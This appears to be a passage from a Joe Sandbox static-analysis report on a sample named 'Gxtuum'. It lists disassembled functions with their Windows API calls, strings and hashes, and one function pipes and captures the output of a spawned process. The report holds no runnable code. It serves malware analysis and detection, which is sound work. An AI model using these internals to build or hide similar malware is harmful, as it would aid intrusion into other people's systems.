GetProcAddress.KERNEL32(00000000,CompareStringEx), ref: 00109A66
GetProcAddress.KERNEL32(00000000,GetLocaleInfoEx), ref: 00109A77
GetProcAddress.KERNEL32(00000000,LCMapStringEx), ref: 00109A88

Strings

SetThreadpoolTimer, xrefs: 00109890
FlsSetValue, xrefs: 00109819
WaitForThreadpoolTimerCallbacks, xrefs: 001098A1
GetTickCount64, xrefs: 0010994B
CloseThreadpoolWait, xrefs: 001098E5
GetLocaleInfoEx, xrefs: 00109A6C
CloseThreadpoolTimer, xrefs: 001098B2
InitializeSRWLock, xrefs: 001099D3
ReleaseSRWLockExclusive, xrefs: 00109A06
GetCurrentPackageId, xrefs: 0010993A
CreateThreadpoolTimer, xrefs: 0010987F
GetFileInformationByHandleEx, xrefs: 0010995C
GetSystemTimePreciseAsFileTime, xrefs: 0010997E
WakeConditionVariable, xrefs: 001099A0
CloseThreadpoolWork, xrefs: 00109A4A
SleepConditionVariableSRW, xrefs: 00109A17
AcquireSRWLockExclusive, xrefs: 001099E4
CompareStringEx, xrefs: 00109A5B
InitializeCriticalSectionEx, xrefs: 0010982A
CreateThreadpoolWait, xrefs: 001098C3
kernel32.dll, xrefs: 001097DE
WakeAllConditionVariable, xrefs: 001099B1
InitializeConditionVariable, xrefs: 0010998F
FlsGetValue, xrefs: 00109808
SleepConditionVariableCS, xrefs: 001099C2
FlsAlloc, xrefs: 001097EB
CreateEventExW, xrefs: 0010984C
FreeLibraryWhenCallbackReturns, xrefs: 00109907
SubmitThreadpoolWork, xrefs: 00109A39
SetThreadpoolWait, xrefs: 001098D4
TryAcquireSRWLockExclusive, xrefs: 001099F5
CreateSymbolicLinkW, xrefs: 0010992E
LCMapStringEx, xrefs: 00109A7D
GetCurrentProcessorNumber, xrefs: 00109918
CreateSemaphoreExW, xrefs: 0010986E
CreateThreadpoolWork, xrefs: 00109A28
InitOnceExecuteOnce, xrefs: 0010983B
CreateSemaphoreW, xrefs: 0010985D
FlsFree, xrefs: 001097F7
FlushProcessWriteBuffers, xrefs: 001098F6
SetFileInformationByHandle, xrefs: 0010996D

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$CloseThreadpoolTimer$CloseThreadpoolWait$CloseThreadpoolWork$CompareStringEx$CreateEventExW$CreateSemaphoreExW$CreateSemaphoreW$CreateSymbolicLinkW$CreateThreadpoolTimer$CreateThreadpoolWait$CreateThreadpoolWork$FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$FlushProcessWriteBuffers$FreeLibraryWhenCallbackReturns$GetCurrentPackageId$GetCurrentProcessorNumber$GetFileInformationByHandleEx$GetLocaleInfoEx$GetSystemTimePreciseAsFileTime$GetTickCount64$InitOnceExecuteOnce$InitializeConditionVariable$InitializeCriticalSectionEx$InitializeSRWLock$LCMapStringEx$ReleaseSRWLockExclusive$SetFileInformationByHandle$SetThreadpoolTimer$SetThreadpoolWait$SleepConditionVariableCS$SleepConditionVariableSRW$SubmitThreadpoolWork$TryAcquireSRWLockExclusive$WaitForThreadpoolTimerCallbacks$WakeAllConditionVariable$WakeConditionVariable$kernel32.dll
API String ID: 667068680-295688737
Opcode ID: 90138d602cd96d544ff80207a6eb0c79db75a7c178fb1b8152578b25cd7118d8
Instruction ID: 14dd56a4a91128b5906b7de6fe3bc2ec9e5ac023324abe6c6bb687b91c1803af
Opcode Fuzzy Hash: 90138d602cd96d544ff80207a6eb0c79db75a7c178fb1b8152578b25cd7118d8
Instruction Fuzzy Hash: 45618AB5956360BFCB087FB5BD0EA5A3EA8BF0A746724441AF901E2974DBF441C08F64

Function 000E8280 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 257
pipeprocessfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000080,?), ref: 000E832D
CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 000E8403
SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 000E8415
Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 000E8459
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,?,00000044,?), ref: 000E8481
Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 000E848F
WaitForSingleObject.KERNEL32(?,00000064), ref: 000E84B8
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E84DA
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E84FE
ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 000E8525
PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 000E856A
CloseHandle.KERNEL32(?), ref: 000E8581
CloseHandle.KERNEL32(?), ref: 000E8589
CloseHandle.KERNEL32(00000000), ref: 000E8591
CloseHandle.KERNEL32(00000000), ref: 000E8599
GetLastError.KERNEL32 ref: 000E85A3

Strings

D, xrefs: 000E83BC

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
String ID: D
API String ID: 3215130363-2746444292
Opcode ID: f3cefdb7817f92995fc82875e7c1bfe95f295a0bb25ca72294d000be1f84c22c
Instruction ID: c26561b2ae39208339ffe200facd5424d09fb0f9e458889925e590a259393ae1
Opcode Fuzzy Hash: f3cefdb7817f92995fc82875e7c1bfe95f295a0bb25ca72294d000be1f84c22c
Instruction Fuzzy Hash: C4A18E71A40268AFEB24DF60CC46BDDB7B9AF04700F1041E5EA09B61D0DBB5AE84CF90

Function 0012047F Relevance: 25.9, APIs: 17, Instructions: 411
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___from_strstr_to_strchr.LIBCMT ref: 001204A9
_free.LIBCMT ref: 00120582
_free.LIBCMT ref: 001205AF

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: 988a7eef56ca0618743ebb60df0fb75319b6f8a41b2fb4b90457abca555d9512
Instruction ID: 5f582b872ce368bb03235f59cefe588a8e44016dd4693828437349844eaec36e
Opcode Fuzzy Hash: 988a7eef56ca0618743ebb60df0fb75319b6f8a41b2fb4b90457abca555d9512
Instruction Fuzzy Hash: 9BD11A71D00325AFDB26AF74AC81AAE77E4EF59310F05436DF94497283EB7199A0CB90

Function 00112E53 Relevance: 22.9, APIs: 15, Instructions: 357COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00112EC2
_free.LIBCMT ref: 00112ED8
_free.LIBCMT ref: 00112EEB
_free.LIBCMT ref: 00112F00
_free.LIBCMT ref: 00112F15
GetCPInfo.KERNEL32(?,?), ref: 00112F5F

Part of subcall function 0011C573: _free.LIBCMT ref: 0011C5DE

_free.LIBCMT ref: 001131CA
_free.LIBCMT ref: 001131DD
_free.LIBCMT ref: 001131EB
_free.LIBCMT ref: 001131F6
_free.LIBCMT ref: 00113238
_free.LIBCMT ref: 00113240
_free.LIBCMT ref: 00113246
_free.LIBCMT ref: 0011324E
_free.LIBCMT ref: 0011325C

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$Info
String ID:
API String ID: 2509303402-0
Opcode ID: 6f62771312da8ace534fa953c6328898005d9fc3236994f48e781bd40afd89ab
Instruction ID: 1f3dbe7c60fb617b98a3d086d13da9e15682adaf4d3f112a03b17462bb5df430
Opcode Fuzzy Hash: 6f62771312da8ace534fa953c6328898005d9fc3236994f48e781bd40afd89ab
Instruction Fuzzy Hash: 69D18D71D003459FDB25DFA8C881BEEBBF5FF58310F144139E4A9A7292DB70A9858B60

Function 00109DEA Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(00148FA8,00000FA0,?,?,00109DC8), ref: 00109DF6
GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00109DC8), ref: 00109E01
GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00109DC8), ref: 00109E12
GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00109E24
GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00109E32
CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00109DC8), ref: 00109E55
DeleteCriticalSection.KERNEL32(00148FA8,00000007,?,?,00109DC8), ref: 00109E71
CloseHandle.KERNEL32(00000000,?,?,00109DC8), ref: 00109E81

Strings

WakeAllConditionVariable, xrefs: 00109E2A
kernel32.dll, xrefs: 00109E0D
SleepConditionVariableCS, xrefs: 00109E1E
api-ms-win-core-synch-l1-2-0.dll, xrefs: 00109DFC

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 2565136772-3242537097
Opcode ID: 0ceb47a2b9d88cd49dc349a3b48c372cdd23b2a28a7b7bb242212de1a58f0b2e
Instruction ID: b600d90773ea8beaee927d555b28179f0e655fbb4fc11b7b06190186fc3fb330
Opcode Fuzzy Hash: 0ceb47a2b9d88cd49dc349a3b48c372cdd23b2a28a7b7bb242212de1a58f0b2e
Instruction Fuzzy Hash: 6001DF74645311BBDB21AB74BC19A2B3A69BF85B91B140014FC40D6AE4DFB0CC808660

Function 00120DF7 Relevance: 19.6, APIs: 13, Instructions: 88COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00120E14

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

_free.LIBCMT ref: 00120E26
_free.LIBCMT ref: 00120E38
_free.LIBCMT ref: 00120E4A
_free.LIBCMT ref: 00120E5C
_free.LIBCMT ref: 00120E6E
_free.LIBCMT ref: 00120E80
_free.LIBCMT ref: 00120E92
_free.LIBCMT ref: 00120EA4
_free.LIBCMT ref: 00120EB6
_free.LIBCMT ref: 00120EC8
_free.LIBCMT ref: 00120EDA
_free.LIBCMT ref: 00120EEC

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e08aa99135b6fb84b1668f85e0a9951654680505a9d7ca4628ded357de989079
Instruction ID: c9a677b6b32e57fb6ca895d49b0925a98bdad327ba0f747b9ec81e293c951066
Opcode Fuzzy Hash: e08aa99135b6fb84b1668f85e0a9951654680505a9d7ca4628ded357de989079
Instruction Fuzzy Hash: 0A213E72504710ABC675EB68FCC6C5BB3EAEBA93107654E18F045E7A62CB74FCD08624

Function 00121AFD Relevance: 18.1, APIs: 12, Instructions: 113COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00121B36

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E14
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E26
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E38
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E4A
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E5C
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E6E
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E80
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120E92
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EA4
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EB6
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EC8
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EDA
Part of subcall function 00120DF7: _free.LIBCMT ref: 00120EEC

_free.LIBCMT ref: 00121B58
_free.LIBCMT ref: 00121B6D
_free.LIBCMT ref: 00121B78
_free.LIBCMT ref: 00121B9A
_free.LIBCMT ref: 00121BAD
_free.LIBCMT ref: 00121BBB
_free.LIBCMT ref: 00121BC6
_free.LIBCMT ref: 00121BFE
_free.LIBCMT ref: 00121C05
_free.LIBCMT ref: 00121C22
_free.LIBCMT ref: 00121C3A

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 5a509833fa1ef15ffd8d728433710aa4e6a80ed066b917ec20dec6aeaf661e6e
Instruction ID: 41af9672aae356a2cfb073c7078c1b5b747fc7a6acefbacbe4211ace791769d6
Opcode Fuzzy Hash: 5a509833fa1ef15ffd8d728433710aa4e6a80ed066b917ec20dec6aeaf661e6e
Instruction Fuzzy Hash: 85314C32600311AFEB35EA78EC45F96B7FAEF60350F148829E059E7151EF70E9A08724

Function 0011B91D Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 301COMMONLIBRARYCODE

Download Yara Rule

Strings

, xrefs: 0011BBBE, 0011BBC3

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3907804496
Opcode ID: 711500e1e4da2e3ebb50c4a34c42fcabab12c17435a4b311a5e6ee811acfaa0b
Instruction ID: 0b8ae7d2805acd4d8c5e7f9c80e5f8f35df12507d3c9a783d4a4edb020361d86
Opcode Fuzzy Hash: 711500e1e4da2e3ebb50c4a34c42fcabab12c17435a4b311a5e6ee811acfaa0b
Instruction Fuzzy Hash: 02C1D170A0C245AFDB19DFA8C8C1BEEBBB0BF59310F144069F5459B2A2CB7199C1CB61

Function 00123E8F Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 273COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00123B48: CreateFileW.KERNEL32(00000000,00000000,?,00123F38,?,?,00000000,?,00123F38,00000000,0000000C), ref: 00123B65

GetLastError.KERNEL32 ref: 00123FA3
__dosmaperr.LIBCMT ref: 00123FAA
GetFileType.KERNEL32(00000000), ref: 00123FB6
GetLastError.KERNEL32 ref: 00123FC0
__dosmaperr.LIBCMT ref: 00123FC9
CloseHandle.KERNEL32(00000000), ref: 00123FE9
CloseHandle.KERNEL32(001177E1), ref: 00124136
GetLastError.KERNEL32 ref: 00124168
__dosmaperr.LIBCMT ref: 0012416F

Strings

H, xrefs: 001240F4

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 4cabe1102f51c705b275218e20c4242fde6070e8d6b69c1a9f7bbe808ed43b03
Instruction ID: 0f51b71f29007d5abd0954c1de1e64083b4601f2b3da468afe763477bc35d004
Opcode Fuzzy Hash: 4cabe1102f51c705b275218e20c4242fde6070e8d6b69c1a9f7bbe808ed43b03
Instruction Fuzzy Hash: 3DA15632A001649FCF1D9F68EC517EE7BA1AF16320F180159F815EF2A1CB359DA6CB52

Function 00120EF5 Relevance: 16.9, APIs: 11, Instructions: 373COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00120F3D
_free.LIBCMT ref: 00120F61
_free.LIBCMT ref: 00120F6E
_free.LIBCMT ref: 00120F93
_free.LIBCMT ref: 00120FA0
_free.LIBCMT ref: 00120FA9
_free.LIBCMT ref: 00121283
_free.LIBCMT ref: 0012128B

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: bdec59f59a08f04f732bcf6251f79bf9c09292db50031cc814f583b315c4deb3
Instruction ID: 55d3c87de21f2f8ea26c17e8f8e431f15491539c8e4512faa531a8b4f69fdf75
Opcode Fuzzy Hash: bdec59f59a08f04f732bcf6251f79bf9c09292db50031cc814f583b315c4deb3
Instruction Fuzzy Hash: ADC18772E40214BFDB64DBA8CC82FEE77F99B19710F544065FA04FB282D770A98097A4

Function 0010D112 Relevance: 16.1, APIs: 6, Strings: 3, Instructions: 304COMMONLIBRARYCODE

Download Yara Rule

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 0010D20F
type_info::operator==.LIBVCRUNTIME ref: 0010D231
___TypeMatch.LIBVCRUNTIME ref: 0010D340
IsInExceptionSpec.LIBVCRUNTIME ref: 0010D412
_UnwindNestedFrames.LIBCMT ref: 0010D496
CallUnexpected.LIBVCRUNTIME ref: 0010D4B1

Strings

csm, xrefs: 0010D14F
csm, xrefs: 0010D1BC
csm, xrefs: 0010D268

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: ExceptionSpec$CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 2123188842-393685449
Opcode ID: 3b200bf2838968325385b8402db82a5cf1b1e4673d1ae0c21e9b54624fc14529
Instruction ID: 58cc018d26f082863fe0b905d2c9232b69031924c6fe9a4b4604562c711a6c4b
Opcode Fuzzy Hash: 3b200bf2838968325385b8402db82a5cf1b1e4673d1ae0c21e9b54624fc14529
Instruction Fuzzy Hash: 9EB19D71800209EFCF18DFE4E8819AEBBB5FF14310B144169F895AB696D7B0EA51CF91

Function 001170A8 Relevance: 15.1, APIs: 10, Instructions: 69COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001170BE

Part of subcall function 001185A6: HeapFree.KERNEL32(00000000,00000000,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?), ref: 001185BC
Part of subcall function 001185A6: GetLastError.KERNEL32(?,?,0012154C,?,00000000,?,?,?,001217EF,?,00000007,?,?,00121C94,?,?), ref: 001185CE

_free.LIBCMT ref: 001170CA
_free.LIBCMT ref: 001170D5
_free.LIBCMT ref: 001170E0
_free.LIBCMT ref: 001170EB
_free.LIBCMT ref: 001170F6
_free.LIBCMT ref: 00117101
_free.LIBCMT ref: 0011710C
_free.LIBCMT ref: 00117117
_free.LIBCMT ref: 00117125

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: a6628158ddeb24f4a34ba61f7e9cedf93a88564bc8ffd72b5d8fefbc041f917a
Instruction ID: 7becc53ad281a994ba193c646e54b98d8ff7a8689fce5e7bef6e9aeeb4a69bb4
Opcode Fuzzy Hash: a6628158ddeb24f4a34ba61f7e9cedf93a88564bc8ffd72b5d8fefbc041f917a
Instruction Fuzzy Hash: DC219A76910208AFCB45EF94CD81DDEBBB9FF98340F0181A5F515AB121EB31EA84CB90

Function 00121314 Relevance: 13.7, APIs: 9, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00121382
_free.LIBCMT ref: 0012138E
_free.LIBCMT ref: 001214B7
_free.LIBCMT ref: 001214C2

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 09ebec626ab53d40dc64ef3ed5336fd067fc453f1db750c4afa9e4a95943e1b9
Instruction ID: 2571bb16390ccdc858a6142a25f53e43171d3637e9f892ffdb9a42ae2a3235f1
Opcode Fuzzy Hash: 09ebec626ab53d40dc64ef3ed5336fd067fc453f1db750c4afa9e4a95943e1b9
Instruction Fuzzy Hash: DE610671900355BFDB24EF64D841FAAB7F9FF65720F104529E849EB281EB70AD808B50

Function 00109173 Relevance: 13.6, APIs: 9, Instructions: 139threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0010919B
GetCurrentThreadId.KERNEL32 ref: 001091B8
GetCurrentThreadId.KERNEL32 ref: 001091CD
_xtime_get.LIBCPMT ref: 00109253
GetCurrentThreadId.KERNEL32 ref: 0010927D
__Xtime_diff_to_millis2.LIBCPMT ref: 00109299
_xtime_get.LIBCPMT ref: 001092BC
GetCurrentThreadId.KERNEL32 ref: 001092C6
GetCurrentThreadId.KERNEL32 ref: 001092FD

Memory Dump Source

Source File: 00000002.00000002.1678852091.00000000000E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 000E0000, based on PE: true

Associated: 00000002.00000002.1678833772.00000000000E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678886854.0000000000131000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678948824.0000000000146000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000002.00000002.1678966369.000000000014D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_e0000_Gxtuum.jbxd

Similarity

API ID: CurrentThread$_xtime_get$Xtime_diff_to_millis2
String ID:
API String ID: 3943753294-0
Opcode ID: 897eb11877fd43a912f490587694e36c4f9e490a2598b8a09484984ad79e4b6c
Instruction ID: 92da8a4f611b4c4ecaa8525b3e54c566a885e3823ee3bd729b81c90f3326f945
Opcode Fuzzy Hash: 897eb11877fd43a912f490587694e36c4f9e490a2598b8a09484984ad79e4b6c
Instruction Fuzzy Hash: C3517C75A00206EFCF10DF64C9A55A9B7F4FF09320B25855AE886AB6D6C7B0ED80CB50

Function 00102B60 Relevance: 12.3, APIs: 8, Instructions: 343COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00102C27
std::_Rethrow_future_exception.LIBCPMT ref: 00102C74
std::_Rethrow_future_exception.LIBCPMT ref: 00102C84
__Mtx_unlock.LIBCPMT ref: 00102D1B
__Mtx_unlock.LIBCPMT ref: 00102E14
__Mtx_unlock.LIBCPMT ref: 00102E62
__Cnd_broadcast.LIBCPMT ref: 00102EAC
